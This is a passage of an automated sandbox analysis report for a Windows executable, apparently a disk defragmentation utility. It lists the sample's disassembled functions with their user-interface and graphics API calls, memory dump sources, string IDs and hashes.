                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                    • API String ID: 3599163918-2734650818
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                    Function 00428720 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                    • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                    • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                    Function 004164C0 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                    • String ID: 4$COMBOBOX
                                                                                                                                                                                                                                                                                    • API String ID: 3327461832-2064896087
                                                                                                                                                                                                                                                                                    • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                    Function 00432180 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 303windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2611688555
                                                                                                                                                                                                                                                                                    • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                    Function 0040AE80 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 434COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object
                                                                                                                                                                                                                                                                                    • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                    • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                    • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                    Function 00421750 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 306windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,113262B6), ref: 004215AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401097$ScheduleStart$` Zt$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1016491994-1829443342
                                                                                                                                                                                                                                                                                    • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                    Function 00401570 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 273windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                    • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                    • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                    • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                    • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                    • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                    • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                    • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                    • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                    • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
